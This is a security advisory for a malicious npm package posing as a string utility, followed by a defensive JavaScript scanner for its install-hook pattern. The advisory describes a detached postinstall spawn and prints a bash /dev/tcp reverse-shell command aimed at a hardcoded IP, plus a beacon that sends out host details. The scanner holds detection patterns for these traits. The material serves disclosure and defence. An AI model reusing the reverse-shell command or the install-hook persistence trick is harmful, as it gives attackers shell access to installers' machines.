
MAL-2026-6235

Malicious code in yianzzkf6687 (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (a59a0aee58573b3030b9d541980fa9d7df8ea55d4e6cc5b3bb349452b908d0e9)

On `npm install`, the postinstall hook (`scripts/postinstall.js`) detach-spawns `scripts/shell.js` with `detached: true, stdio: 'ignore', windowsHide: true` and `unref()`s it, so the malicious process persists silently after `npm install` returns. `scripts/shell.js` hardcodes `HOST = '114.67.90.67'` and opens reverse shells to that IP across multiple fallback ports (3334, 4444, 443, 80, 8080, 53) using Node `net`, `bash -c "bash -i >& /dev/tcp/<HOST>/<port> 0>&1"`, and a Python fallback, then uses `setInterval` to keep the process alive. It also sends an HTTP GET to `http://114.67.90.67:8333/ping` with the installer's hostname, username, cwd, and OS platform/release as query parameters, confirming victim acquisition. The package advertises itself as a string-manipulation utility, providing cover for the backdoor. Installing this package gives the operator of 114.67.90.67 interactive shell access on the installer's machine.
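A defender-side triage check for the pattern described above, as an added example that is not part of the advisory or of any scanner's own code: it follows a package's install hooks into the scripts they launch and reports the detach-and-forget spawn options and the host named in the advisory. The `auditPackage` function, the indicator names and the in-memory sample package are assumptions made for illustration.

```javascript
// Lifecycle hooks npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Indicators drawn from the advisory text (the ids are this example's own names).
const INDICATORS = [
  { id: 'detached-spawn', re: /detached\s*:\s*true/ },
  { id: 'stdio-ignored', re: /stdio\s*:\s*['"]ignore['"]/ },
  { id: 'unref', re: /\.unref\s*\(/ },
  { id: 'dev-tcp-redirect', re: /\/dev\/tcp\// },
  { id: 'advisory-host', re: /114\.67\.90\.67/ },
];

// Extract relative .js paths from a hook command or a script body.
function referencedScripts(text) {
  return [...text.matchAll(/[\w./-]+\.js\b/g)].map(m => m[0].replace(/^\.\//, ''));
}

// files: object mapping package-relative path -> file contents (strings).
// Follows script references so a short hook that launches a second file is still scanned.
function auditPackage(files) {
  const manifest = JSON.parse(files['package.json']);
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const command = (manifest.scripts || {})[hook];
    if (!command) continue;
    const queue = referencedScripts(command);
    const seen = new Set();
    const hits = new Set();
    while (queue.length) {
      const path = queue.shift();
      if (seen.has(path) || !(path in files)) continue;
      seen.add(path);
      for (const { id, re } of INDICATORS) if (re.test(files[path])) hits.add(id);
      queue.push(...referencedScripts(files[path]));
    }
    findings.push({ hook, command, scanned: [...seen], indicators: [...hits].sort() });
  }
  return findings;
}

// Constructed sample mirroring the file layout the advisory describes (not the real package).
const SAMPLE = {
  'package.json': JSON.stringify({ name: 'example-pkg', scripts: { postinstall: 'node scripts/postinstall.js' } }),
  'scripts/postinstall.js': "require('child_process').spawn(process.execPath, ['scripts/shell.js'], { detached: true, stdio: 'ignore', windowsHide: true }).unref();",
  'scripts/shell.js': "const HOST = '114.67.90.67'; // payload body omitted in this constructed sample",
};
```

In practice the file map would be built from a package tarball unpacked for inspection rather than installed, so that no lifecycle script runs during triage.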

Affected packages

npm / yianzzkf6687

No fixed version published yet for yianzzkf6687 (npm). Pin to a known-safe version or switch to an alternative.
